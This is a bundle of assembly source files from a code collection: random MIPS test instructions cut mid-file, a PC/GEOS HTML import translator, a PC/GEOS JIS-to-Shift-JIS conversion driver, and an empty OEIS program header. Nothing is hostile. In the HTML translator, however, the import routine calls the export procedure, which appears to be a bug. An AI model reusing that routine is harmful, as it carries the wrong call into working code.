$3, $2, 12 lui $2, 5 TAG616: srl $2, $2, 14 mtlo $2 mfhi $4 beq $2, $2, TAG617 TAG617: lb $3, 0($4) multu $3, $4 srlv $4, $3, $4 multu $4, $3 TAG618: mflo $1 blez $4, TAG619 mfhi $3 nor $4, $1, $1 TAG619: lui $4, 12 mfhi $4 lh $1, 0($4) mtlo $4 TAG620: slt $3, $1, $1 bne $1, $3, TAG621 lui $2, 6 mflo $4 TAG621: lw $1, 0($4) sb $4, 0($4) blez $4, TAG622 xor $1, $4, $1 TAG622: mtlo $1 beq $1, $1, TAG623 mflo $2 mtlo $2 TAG623: beq $2, $2, TAG624 multu $2, $2 bgez $2, TAG624 lhu $2, 0($2) TAG624: bgez $2, TAG625 lhu $4, 0($2) bgtz $2, TAG625 sll $3, $2, 12 TAG625: multu $3, $3 mthi $3 mflo $4 bgez $4, TAG626 TAG626: sh $4, 0($4) mflo $4 bgez $4, TAG627 add $1, $4, $4 TAG627: sltiu $2, $1, 10 addiu $2, $2, 4 beq $2, $2, TAG628 nor $1, $2, $1 TAG628: mult $1, $1 lui $2, 5 beq $2, $1, TAG629 mflo $2 TAG629: andi $3, $2, 11 lw $1, 0($3) lui $4, 8 addiu $4, $4, 7 TAG630: mult $4, $4 sll $0, $0, 0 beq $4, $1, TAG631 sll $0, $0, 0 TAG631: mfhi $3 beq $1, $3, TAG632 mthi $3 lb $1, 0($1) TAG632: mult $1, $1 lui $3, 3 blez $1, TAG633 mtlo $1 TAG633: mfhi $3 addi $1, $3, 10 lbu $4, 0($3) andi $4, $3, 6 TAG634: sh $4, 0($4) sh $4, 0($4) add $2, $4, $4 lb $3, 0($4) TAG635: lui $2, 13 mfhi $4 sh $4, 0($4) sra $2, $3, 2 TAG636: sub $1, $2, $2 mult $2, $1 beq $2, $2, TAG637 multu $2, $2 TAG637: lh $1, 0($1) sub $4, $1, $1 subu $3, $4, $1 mtlo $4 TAG638: multu $3, $3 sh $3, 0($3) andi $1, $3, 0 multu $3, $3 TAG639: mtlo $1 multu $1, $1 mult $1, $1 sub $3, $1, $1 TAG640: mult $3, $3 lbu $4, 0($3) mfhi $2 bgtz $4, TAG641 TAG641: lbu $1, 0($2) ori $3, $2, 13 srlv $1, $3, $3 bgtz $1, TAG642 TAG642: lui $3, 1 bgtz $1, TAG643 lui $1, 8 divu $3, $1 TAG643: sll $0, $0, 0 beq $1, $1, TAG644 subu $1, $1, $1 bne $1, $1, TAG644 TAG644: sltiu $2, $1, 9 lui $1, 0 bne $1, $1, TAG645 lbu $3, 0($2) TAG645: bne $3, $3, TAG646 lh $3, 0($3) sb $3, 0($3) mflo $3 TAG646: multu $3, $3 mthi $3 beq $3, $3, TAG647 andi $2, $3, 8 TAG647: sb $2, 0($2) addu $1, $2, $2 slt $2, $1, $1 sb $2, 0($2) TAG648: lui $3, 8 lb $3, 0($2) bltz $2, TAG649 mthi $3 TAG649: mflo $1 lui $4, 11 and $2, $4, $3 bgtz $2, TAG650 TAG650: sb $2, 0($2) lui $4, 9 addu $4, $4, $4 sll $0, $0, 0 TAG651: sll $0, $0, 0 lui $2, 12 bgez $4, TAG652 lui $2, 6 TAG652: mtlo $2 mtlo $2 sll $0, $0, 0 sltu $4, $2, $2 TAG653: mthi $4 mflo $3 multu $4, $4 multu $3, $3 TAG654: blez $3, TAG655 addiu $2, $3, 12 mtlo $2 sllv $1, $2, $3 TAG655: mfhi $4 divu $1, $4 sll $0, $0, 0 divu $4, $1 TAG656: sltu $3, $4, $4 mfhi $4 addu $4, $4, $4 bltz $4, TAG657 TAG657: sllv $1, $4, $4 div $1, $4 beq $4, $4, TAG658 srav $4, $4, $1 TAG658: bgez $4, TAG659 lui $1, 15 mult $4, $1 mult $4, $4 TAG659: bgez $1, TAG660 mthi $1 lw $2, 0($1) bgez $1, TAG660 TAG660: lui $1, 15 divu $1, $2 mthi $2 lui $3, 4 TAG661: mfhi $2 mtlo $3 addiu $2, $2, 7 bgtz $2, TAG662 TAG662: sll $0, $0, 0 sll $0, $0, 0 lui $1, 10 mfhi $4 TAG663: subu $3, $4, $4 mtlo $3 beq $4, $4, TAG664 and $4, $4, $3 TAG664: beq $4, $4, TAG665 lui $3, 13 sw $3, 0($3) bltz $3, TAG665 TAG665: mtlo $3 sll $0, $0, 0 xori $2, $1, 10 bne $1, $1, TAG666 TAG666: mflo $3 mtlo $3 mtlo $2 mfhi $2 TAG667: lui $4, 15 sll $0, $0, 0 addu $2, $4, $4 addu $1, $4, $2 TAG668: blez $1, TAG669 lui $4, 14 mflo $3 sra $2, $3, 10 TAG669: bgtz $2, TAG670 lbu $2, -640($2) mfhi $3 mfhi $3 TAG670: div $3, $3 div $3, $3 sll $0, $0, 0 lui $4, 14 TAG671: mtlo $4 slti $1, $4, 12 bgtz $4, TAG672 or $1, $1, $4 TAG672: sll $0, $0, 0 div $1, $1 divu $1, $3 mflo $4 TAG673: bne $4, $4, TAG674 mult $4, $4 mthi $4 xori $1, $4, 11 TAG674: lh $4, 0($1) sw $1, -2826($4) mthi $1 ori $2, $1, 5 TAG675: bgtz $2, TAG676 addiu $2, $2, 11 sw $2, 0($2) lhu $2, 0($2) TAG676: subu $2, $2, $2 lui $1, 12 divu $1, $1 multu $2, $1 TAG677: lui $3, 1 subu $2, $1, $3 beq $3, $2, TAG678 mtlo $2 TAG678: mflo $4 mflo $4 bgtz $4, TAG679 xori $2, $2, 12 TAG679: sll $0, $0, 0 and $4, $2, $2 bgez $4, TAG680 lui $1, 1 TAG680: mult $1, $1 sll $0, $0, 0 sll $0, $0, 0 mtlo $4 TAG681: mthi $4 sll $0, $0, 0 sll $0, $0, 0 bne $4, $4, TAG682 TAG682: mflo $2 lui $3, 4 xor $4, $2, $4 bne $4, $4, TAG683 TAG683: mult $4, $4 lui $2, 3 mflo $3 mult $2, $4 TAG684: sub $1, $3, $3 lui $3, 11 srav $3, $3, $3 sll $0, $0, 0 TAG685: sll $0, $0, 0 sll $0, $0, 0 mfhi $3 mthi $2 TAG686: bne $3, $3, TAG687 lbu $4, 0($3) blez $4, TAG687 lbu $1, 0($3) TAG687: beq $1, $1, TAG688 lb $3, 0($1) bgez $3, TAG688 multu $3, $3 TAG688: lh $4, 0($3) sb $3, 0($3) ori $1, $4, 1 mthi $1 TAG689: bgtz $1, TAG690 addu $3, $1, $1 mthi $1 xor $2, $1, $3 TAG690: bltz $2, TAG691 mflo $4 mtlo $4 multu $4, $2 TAG691: lb $3, 0($4) lui $2, 7 div $4, $2 sltiu $3, $4, 14 TAG692: mtlo $3 lbu $1, 0($3) sb $1, 0($3) bltz $1, TAG693 TAG693: sltiu $3, $1, 13 bltz $1, TAG694 sb $1, 0($3) lui $3, 0 TAG694: bgez $3, TAG695 mflo $1 mthi $3 mtlo $3 TAG695: div $1, $1 lb $3, 0($1) lui $2, 9 mfhi $3 TAG696: mult $3, $3 or $3, $3, $3 andi $1, $3, 7 srlv $2, $1, $3 TAG697: bltz $2, TAG698 xor $2, $2, $2 lui $2, 8 sll $0, $0, 0 TAG698: or $1, $3, $3 beq $3, $3, TAG699 lw $3, 0($3) nor $1, $3, $3 TAG699: lui $4, 3 mtlo $1 sltiu $2, $4, 9 mfhi $4 TAG700: mflo $3 mfhi $4 lui $2, 6 mthi $4 TAG701: mtlo $2 sll $0, $0, 0 lui $4, 1 beq $2, $4, TAG702 TAG702: ori $3, $4, 8 mthi $3 mult $4, $4 sll $0, $0, 0 TAG703: sll $0, $0, 0 addiu $4, $2, 3 sll $0, $0, 0 mflo $2 TAG704: add $4, $2, $2 andi $4, $4, 3 addiu $3, $4, 6 bgez $4, TAG705 TAG705: mfhi $3 andi $4, $3, 13 sllv $1, $4, $3 beq $3, $3, TAG706 TAG706: mthi $1 mthi $1 lui $4, 8 addiu $4, $4, 5 TAG707: sltu $3, $4, $4 bgtz $4, TAG708 and $3, $4, $4 add $2, $3, $3 TAG708: lw $3, 0($2) srlv $4, $2, $3 mthi $3 srlv $3, $2, $4 TAG709: lhu $2, 0($3) mflo $2 mthi $2 xor $2, $3, $2 TAG710: beq $2, $2, TAG711 sw $2, 0($2) bgez $2, TAG711 mfhi $2 TAG711: bne $2, $2, TAG712 sb $2, 0($2) bne $2, $2, TAG712 andi $1, $2, 5 TAG712: lh $1, 0($1) sw $1, 0($1) lh $1, 0($1) mult $1, $1 TAG713: bne $1, $1, TAG714 sw $1, 0($1) lui $2, 9 bgtz $2, TAG714 TAG714: sll $3, $2, 15 mfhi $2 sb $2, 0($2) mflo $2 TAG715: beq $2, $2, TAG716 lbu $1, 0($2) bgez $1, TAG716 mthi $2 TAG716: beq $1, $1, TAG717 multu $1, $1 lb $2, 0($1) nor $1, $2, $2 TAG717: mfhi $1 beq $1, $1, TAG718 mfhi $4 addu $4, $4, $1 TAG718: and $2, $4, $4 ori $3, $4, 2 bne $3, $2, TAG719 sb $2, 0($3) TAG719: beq $3, $3, TAG720 addu $3, $3, $3 sb $3, 0($3) bgtz $3, TAG720 TAG720: mflo $2 sw $3, 0($3) mflo $4 lb $2, 0($2) TAG721: mtlo $2 ori $4, $2, 4 lui $4, 14 bgez $4, TAG722 TAG722: lui $2, 14 sll $0, $0, 0 mtlo $4 andi $2, $4, 11 TAG723: mthi $2 lui $1, 7 mfhi $3 lui $3, 11 TAG724: sll $0, $0, 0 addu $1, $1, $3 sll $0, $0, 0 beq $1, $1, TAG725 TAG725: mtlo $1 slt $1, $1, $1 blez $1, TAG726 mflo $1 TAG726: sll $0, $0, 0 mflo $4 div $4, $4 andi $2, $1, 2 TAG727: sb $2, 0($2) blez $2, TAG728 lb $1, 0($2) sh $2, 0($2) TAG728: multu $1, $1 lui $2, 4 mthi $2 mfhi $1 TAG729: sll $0, $0, 0 mfhi $1 bgtz $3, TAG730 lui $3, 15 TAG730: mult $3, $3 mthi $3 blez $3, TAG731 sll $0, $0, 0 TAG731: mtlo $3 srav $3, $3, $3 lui $1, 8 sll $0, $0, 0 TAG732: lui $3, 4 sll $0, $0, 0 mtlo $3 addiu $1, $3, 11 TAG733: sll $0, $0, 0 bltz $1, TAG734 lui $4, 5 sll $0, $0, 0 TAG734: and $2, $4, $4 bne $2, $2, TAG735 mflo $1 div $4, $1 TAG735: lui $4, 2 sll $0, $0, 0 sll $0, $0, 0 blez $4, TAG736 TAG736: sll $0, $0, 0 sll $1, $2, 6 bne $1, $2, TAG737 sll $0, $0, 0 TAG737: srav $4, $1, $1 mfhi $2 sll $0, $0, 0 lui $2, 9 TAG738: mult $2, $2 bgtz $2, TAG739 mfhi $1 andi $4, $2, 1 TAG739: mthi $4 sll $0, $0, 0 mult $4, $4 bne $4, $4, TAG740 TAG740: andi $1, $4, 2 multu $4, $1 lui $3, 8 subu $1, $1, $3 TAG741: srav $2, $1, $1 nor $4, $1, $2 beq $2, $1, TAG742 mtlo $2 TAG742: blez $4, TAG743 mtlo $4 or $4, $4, $4 mult $4, $4 TAG743: addiu $4, $4, 3 sll $0, $0, 0 mthi $2 mult $4, $2 TAG744: sll $0, $0, 0 lui $1, 15 beq $1, $2, TAG745 srlv $4, $1, $1 TAG745: sltiu $1, $4, 14 sltiu $2, $4, 1 sw $4, 0($1) bltz $4, TAG746 TAG746: sh $2, 0($2) lw $3, 0($2) ori $3, $3, 3 bltz $3, TAG747 TAG747: lui $3, 11 srlv $2, $3, $3 div $3, $2 mfhi $1 TAG748: beq $1, $1, TAG749 lui $1, 7 andi $1, $1, 11 sh $1, 0($1) TAG749: sll $0, $0, 0 xor $4, $1, $1 blez $4, TAG750 lui $2, 4 TAG750: nop nop test_end: beq $0, $0, test_end nop

Library/Trans/Web/HtmlImpx/htmlimpt/htmlimptManager.asm

steakknife/pcgeos

504

176252

<filename>Library/Trans/Web/HtmlImpx/htmlimpt/htmlimptManager.asm include stdapp.def include vm.def include impex.def include Objects/gCtrlC.def ; segment must be "public 'CODE'" to ensure that it combines ; properly with the C segment of the same name. imptproc_TEXT segment byte public 'CODE' extrn IMPROTPROCEDURE: far extrn GETFORMAT: far imptproc_TEXT ends exptproc_TEXT segment byte public 'CODE' extrn EXPORTPROCEDURE: far exptproc_TEXT ends global LibraryEntry: far global TransExport: far global TransImport: far global TransGetFormat: far global TransGetImportUI: far global TransGetExportUI: far global TransInitImportUI: far global TransInitExportUI: far global TransGetImportOptions: far global TransGetExportOptions: far INIT segment resource assume cs:INIT db "OK" dw InfoResource ; resource containing format names dw 1 ; contains one sub-format dw mask IDC_TEXT ; this is a text translator db "OK" LibraryEntry proc far clc ret LibraryEntry endp INIT ends ASM segment resource assume cs:ASM TransExport proc far uses es,ds,si,di .enter push ds ; arg 1: pointer to export data block push si call EXPORTPROCEDURE ; Call high-level procedure to do work ; AX returns error code .leave ret TransExport endp TransImport proc far uses es,ds,si,di _vmc local dword .enter push ds ; arg 1: pointer to import data block push si push ss ; arg 2: pointer to vm chain return buf lea ax,_vmc push ax call EXPORTPROCEDURE ; Call high-level procedure to do work mov bx,dx ; BX:AX returns error code or format ID movdw dxcx,_vmc ; VMChain of object returned in DX:CX .leave ret TransImport endp TransGetFormat proc far uses es,ds,si,di,bx,dx .enter push si ; handle of file to be tested mov ax,idata ; DS=dgroup mov ds,ax call GETFORMAT ; Call high-level procedure to do work mov cx,ax ; return word value xor ax,ax .leave retf TransGetFormat endp TransGetImportUI proc far mov bp,4 ; offset of pointer in info entry push di push ds mov bx,handle InfoResource call MemLock mov ds,ax mov ax,14 ; size of one entry mul cx mov di,offset infoTable add di,ax mov cx,[ds:bp+di+002h] mov dx,[ds:bp+di] call MemUnlock xor ax,ax mov bx,ax pop ds pop di ret TransGetImportUI endp TransGetExportUI proc far xor cx,cx ret TransGetExportUI endp TransGetImportOptions proc far push ax push cx push bx push bp push si push di push ds cmp dx,0 ; UI not yet initialized? je iopt_err ; return no options (null handle) mov ax,MSG_GEN_BOOLEAN_GROUP_GET_SELECTED_BOOLEANS mov bx,dx mov si,offset booleanOptions mov di,mask MF_CALL call ObjMessage push ax mov ax,00002h mov cl,050h mov ch,040h call MemAlloc xor dx,dx jc iopt_err push ax pop ds pop ax mov [ds:00000h],ax ; booleanOptions call MemUnlock mov dx,bx clc iopt_err: pop ds pop di pop si pop bp pop bx pop cx pop ax ret TransGetImportOptions endp TransGetExportOptions proc far xor dx,dx ret TransGetExportOptions endp TransInitImportUI proc far ret TransInitImportUI endp TransInitExportUI proc far ret TransInitExportUI endp ASM ends include htmlimpt.rdef InfoResource segment lmem LMEM_TYPE_GENERAL,mask LMF_IN_RESOURCE infoTable dw fmt_1_name,fmt_1_mask D_OPTR ImportSettings dw 0,0 dw 0C000h ; we support import and export dw 0 fmt_1_name chunk char char "HTML (Hypertext Markup Language)",0 fmt_1_name endc fmt_1_mask chunk char char "*.htm",0 fmt_1_mask endc InfoResource ends

Driver/IFS/DOS/Common/dosConvertJIS.asm

steakknife/pcgeos

504

3694

COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Copyright (c) GeoWorks 1993 -- All Rights Reserved PROJECT: PC GEOS MODULE: FILE: dosConvertJIS.asm AUTHOR: <NAME>, Dec 21, 1993 ROUTINES: Name Description ---- ----------- REVISION HISTORY: Name Date Description ---- ---- ----------- Gene 12/21/93 Initial revision DESCRIPTION: Code for JIS support. $Id: dosConvertJIS.asm,v 1.1 97/04/10 11:55:13 newdeal Exp $ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ Resident segment resource DosJISToGeosChar proc near call DosJISToGeosCharFar ret DosJISToGeosChar endp GeosToDosJISChar proc near call GeosToDosJISCharFar ret GeosToDosJISChar endp DosJISToGeosCharString proc near call DosJISToGeosCharStringFar ret DosJISToGeosCharString endp GeosToDosJISCharString proc near call GeosToDosJISCharStringFar ret GeosToDosJISCharString endp DosSJISToGeosCharFar proc far call DosSJISToGeosChar ret DosSJISToGeosCharFar endp GeosToDosSJISCharFar proc far call GeosToDosSJISChar ret GeosToDosSJISCharFar endp Resident ends ConvertRare segment resource COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% DosJISToGeosCharFar %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Convert a JIS character to a GEOS character CALLED BY: DCSConvertToDOSChar() PASS: bx - DosCodePage to use ax - JIS character RETURN: carry - set if error ah - 0 al - DTGSS_SUBSTITUTIONS or al - DTGSS_INVALID_CHARACTER else: ax - GEOS character DESTROYED: none PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: This should deal with JIS characters that are not in SJIS. REVISION HISTORY: Name Date Description ---- ---- ----------- gene 12/21/93 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ DosJISToGeosCharFar proc far .enter ; ; Convert the JIS character to SJIS ; call ConvJISToSJIS jc done ; ; Convert the SJIS character to GEOS ; call DosSJISToGeosCharFar done: .leave ret DosJISToGeosCharFar endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% GeosToDosJISCharFar %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Convert a GEOS character to a JIS character. CALLED BY: DCSConvertToGEOSChar() PASS: bx - DosCodePage to use ax - GEOS character RETURN: carry - set if error ah - 0 al - DTGSS_SUBSTITUTIONS else: ax - JIS character DESTROYED: none PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: This should deal with JIS characters that are not in SJIS. REVISION HISTORY: Name Date Description ---- ---- ----------- gene 12/21/93 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ GeosToDosJISCharFar proc far .enter ; ; Convert the GEOS character to SJIS ; call GeosToDosSJISCharFar jc done ; ; Convert the SJIS character to JIS ; call ConvSJISToJIS done: .leave ret GeosToDosJISCharFar endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ConvJISToSJIS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Convert a JIS character to SJIS CALLED BY: DosJISToGeosCharFar() PASS: ax - JIS character RETURN: carry - set if error ah - 0 al - DTGSS_SUBSTITUTIONS al - DTGSS_INVALID_CHARACTER else: ax - SJIS character DESTROYED: none PSEUDO CODE/STRATEGY: c1 = j/256; c2 = j%256; rowOffset = (c1 < 95) ? 112 : 176; cellOffset = (c1 % 2) ? (31 + (c2 > 95)) : 126; r1 = ((c1 + 1) >> 1) + rowOffset; r2 = c2 + cellOffset; return(r1*256 + r2); KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- gene 12/21/93 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ ConvJISToSJIS proc near uses dx .enter ; ; Check for SBCS character ; tst ah ;SBCS JIS char? jz done ;branch if SBCS ; ; dh = rowOffset = (c1 < 95) ? 112 : 176; ; mov dh, 112 ;dh <- row offset cmp ah, 95 jb gotRowOffset mov dh, 176 ;dh <- row offset gotRowOffset: ; ; dl = cellOffset = (c1 % 2) ? (31 + (c2 > 95)) : 126; ; mov dl, 126 ;dl <- cell offset test ah, 0x1 jz gotCellOffset ;branch if false mov dl, 31 ;dl <- cell offset cmp al, 95 ;branch if false jbe gotCellOffset inc dl ;dl <- cell offset gotCellOffset: ; ; r1 = ((c1 + 1) >> 1) + rowOffset ; inc ah shr ah, 1 add ah, dh ; ; r2 = c2 + cellOffset; ; add al, dl done: .leave ret ConvJISToSJIS endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ConvSJISToJIS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Convert a SJIS character to JIS CALLED BY: GeosToDosJISCharFar() PASS: ax - SJIS character RETURN: carry - set if error ah - 0 al - DTGSS_SUBSTITUTIONS al - DTGSS_INVALID_CHARACTER else: ax - JIS character DESTROYED: none PSEUDO CODE/STRATEGY: c1 = j/256; c2 = j%256; adjust = c2 < 159; rowOffset = c1 < 160 ? 112 : 176; cellOffset = adjust ? (31 + (c2 > 127)) : 126; r1 = ((c1 - rowOffset) << 1) - adjust; r2 = c2-cellOffset; return(r1*256+r2); KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- gene 12/21/93 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ ConvSJISToJIS proc near uses cx, dx .enter ; ; Check for SBCS character ; tst ah ;SBCS SJIS char? jz done ;branch if SBCS clr cx ;cx <- adjust (0) cmp al, 159 jae gotAdjust inc cx ;cx <- adjust (1) gotAdjust: ; ; dh = rowOffset = c1 < 160 ? 112 : 176; ; mov dh, 112 ;dh <- row offset cmp ah, 160 jb gotRowOffset mov dh, 176 ;dh <- row offset gotRowOffset: ; ; dl = cellOffset = adjust ? (31 + (c2 > 127)) : 126; ; mov dl, 126 ;dl <- cell offset jcxz gotCellOffset ;branch if false mov dl, 31 ;dl <- cell offset cmp al, 127 jbe gotCellOffset ;branch if false inc dl ;dl <- cell ofset gotCellOffset: ; ; r1 = ((c1 - rowOffset) << 1) - adjust; ; sub ah, dh shl ah, 1 sub ah, cl ; ; r2 = c2-cellOffset; ; sub al, dl done: .leave ret ConvSJISToJIS endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% DosJISToGeosCharStringFar %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Convert a JIS character in a string to a GEOS character CALLED BY: DCSConvertToGEOSChar() PASS: bx - DosCodePage to use ds:si - ptr to JIS string es:di - ptr to GEOS buffer cx - max # of bytes to read RETURN: carry - set if error ah - 0 al - DTGSS_SUBSTITUTIONS ah - # of bytes to back up al - DTGSS_CHARACTER_INCOMPLETE else: ax - GEOS character ds:si - ptr to next character es:di - ptr to next character cx - updated if >1 byte read bx - DosCodePage (may have changed) DESTROYED: none PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- gene 12/21/93 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ DosJISToGeosCharStringFar proc far .enter ; ; Get a byte and see if it is the start of an escape sequence ; nextChar: lodsb ;al <- byte of JIS string cmp al, C_ESCAPE ;<Esc>? je handleEsc ; ; See if we are doing SBCS or DBCS ; cmp bx, CODE_PAGE_JIS ;doing SBCS? jne isDBCS ;branch if not ; ; Reading SBCS -- just use the byte ; call doSBCSChar ;ax = GEOS char jc exit ; ; Store the GEOS character ; storeChar: stosw ;store GEOS character exit: .leave ret ; ; Read first byte of a two byte character, or first one or ; two bytes of three byte ESC seq, but rest is not there to read ; partialChar3: mov ah, 3 ;ah <- # bytes to back up jmp partialCharCommon partialChar2: mov ah, 2 ;ah <- # bytes to back up jmp partialCharCommon partialChar1: mov ah, 1 ;ah <- # bytes to back up partialCharCommon: mov al, DTGSS_CHARACTER_INCOMPLETE stc ;carry <- error jmp exit ; ; Reading DBCS -- get another byte ; isDBCS: call readDBCSByte2 jz partialChar1 ;branch if partial character ; ; Convert JIS to GEOS ; call DosJISToGeosCharFar jc exit ;branch if error jmp storeChar ; ; We've hit an <Esc> -- switch modes if necessary. ; handleEsc: call readDBCSByte1 ;al <- byte after ESC jz partialChar1 call readDBCSByte2 ;ax <- both bytes after ESC jz partialChar2 ;branch if partial character cmp bx, CODE_PAGE_JIS ;in SBCS or DBCS? je inSBCS ;branch if in SBCS ; ; We're in DBCS -- check for an escape to SBCS ; cmp ax, JIS_C_0208_1978_KANJI_ESC je doneEscape ;allow redundant escape cmp ax, JIS_X_0208_1983_KANJI_ESC je doneEscape ;allow redundant escape cmp ax, ANSI_X34_1986_ASCII_ESC je switchToSBCS cmp ax, JIS_X_0201_1976_ROMAN_ESC je switchToSBCS ; ; other escape sequence while in double byte JIS mode, ; return error as ESC is illegal JIS first byte ; mov ax, DTGSS_INVALID_CHARACTER or (0 shl 8) stc ;carry <- error jmp exit switchToSBCS: mov bx, CODE_PAGE_JIS ;bx <- new DosCodePage jmp doneEscape ; ; We're in SBCS -- check for an escape to DBCS ; inSBCS: cmp ax, ANSI_X34_1986_ASCII_ESC je doneEscape ;allow redundant escape cmp ax, JIS_X_0201_1976_ROMAN_ESC je doneEscape ;allow redundant escape cmp ax, JIS_C_0208_1978_KANJI_ESC je switchToDBCS cmp ax, JIS_X_0208_1983_KANJI_ESC je switchToDBCS ; ; other escape sequence while in JIS single byte mode ; -- store the three bytes in GEOS format ; ESC = 1st byte ; ah = 2nd byte ; al = 3rd byte ; cx = (number of characters after escape) + 1 ; push dx mov dx, ax ;save 2nd and 3rd bytes mov ax, C_ESCAPE ;first is escape stosw ;store 1st char clr ax mov al, dh ;ax = 2nd byte call doSBCSChar jc doneEscapePop stosw ;store 2nd char clr ax mov al, dl ;ax = 3rd byte call doSBCSChar jc doneEscapePop stosw doneEscapePop: ; ; finish off non-recognized escape sequence ; pop dx dec cx jnz nextChar clc ;indicate success jmp exit doneEscape: ; ; finish off a recognized escape sequence -- return "incomplete" error ; if nothing follows the escape sequence. This is because we ; are expected to return a converted character, and at this ; point we have read nothing but the escape sequence. ; dec cx jz partialChar3 jmp nextChar switchToDBCS: ; ; Switch to DBCS ; mov bx, CODE_PAGE_JIS_DB ;bx <- new DosCodePage jmp doneEscape ; ; al = SBCS char ; doSBCSChar: clr ah ;ax <- ASCII char ; ; Handle half-width katakana (JIS same as SJIS) ; cmp al, SJIS_SB_START_2 jb doSBCSReturn ;not half-width katakana cmp al, SJIS_SB_END_2 ja doSBCSReturn ;not half-width katakana call DosJISToGeosCharFar ;convert half-width katakana retn ;return status in carry flag doSBCSReturn: clc ;indicate success retn readDBCSByte1: dec cx ;cx <- read one more byte jz isPartialChar ;branch if no more bytes lodsb ;al <- 1st byte retn readDBCSByte2: dec cx ;cx <- read one more byte jz isPartialChar ;branch if no more bytes xchg al, ah lodsb ;ax <- JIS character isPartialChar: retn DosJISToGeosCharStringFar endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% GeosToDosJISCharStringFar %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Convert a GEOS character in a string to a JIS character CALLED BY: DCSConvertToGEOSChar() PASS: bx - DosCodePage to use ds:si - ptr to GEOS string es:di - ptr to JIS buffer cx - max # of chars to read RETURN: carry - set if error ah - 0 al - DTGSS_SUBSTITUTIONS else: ax - JIS character ds:si - ptr to next character es:di - ptr to next character bx - DosCodePage (may have chanaged) DESTROYED: none PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- gene 12/21/93 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ GeosToDosJISCharStringFar proc far .enter ; ; Get a GEOS character and convert to JIS ; lodsw ;ax <- GEOS character call GeosToDosJISCharFar jc exit ;branch if error ; ; Check for ASCII / SBCS ; tst ah ;SBCS or DBCS? jnz isDBCS ;branch if DBCS ; ; ASCII char -- make sure we're in SBCS mode ; cmp bx, CODE_PAGE_JIS jne switchToSBCS storeSBCSChar: stosb ;store SBCS character done: clc ;carry <- no error exit: .leave ret ; ; Switch to SBCS and emit the proper escape sequence ; switchToSBCS: mov bx, offset escapeToSBCS call writeEsc mov bx, CODE_PAGE_JIS jmp storeSBCSChar ; ; DBCS char -- make sure we're in DBCS mode ; isDBCS: cmp bx, CODE_PAGE_JIS_DB jne switchToDBCS storeDBCSChar: xchg al, ah ;store high-low stosw ;store DBCS character jmp done ; ; Switch to SBCS and emit the proper escape sequence ; switchToDBCS: mov bx, offset escapeToDBCS call writeEsc mov bx, CODE_PAGE_JIS_DB jmp storeDBCSChar ; ; Emit a 3-byte escape sequence ; escapeToSBCS byte 0x1b, 0x28, 0x4a ;<ESC> ( J escapeToDBCS byte 0x1b, 0x24, 0x42 ;<ESC> $ B writeEsc: push ds, si segmov ds, cs mov si, bx movsb movsb movsb CheckHack <(length escapeToSBCS) eq 3> pop ds, si retn GeosToDosJISCharStringFar endp ConvertRare ends

programs/oeis/226/A226164.asm

karttu/loda

0

92431

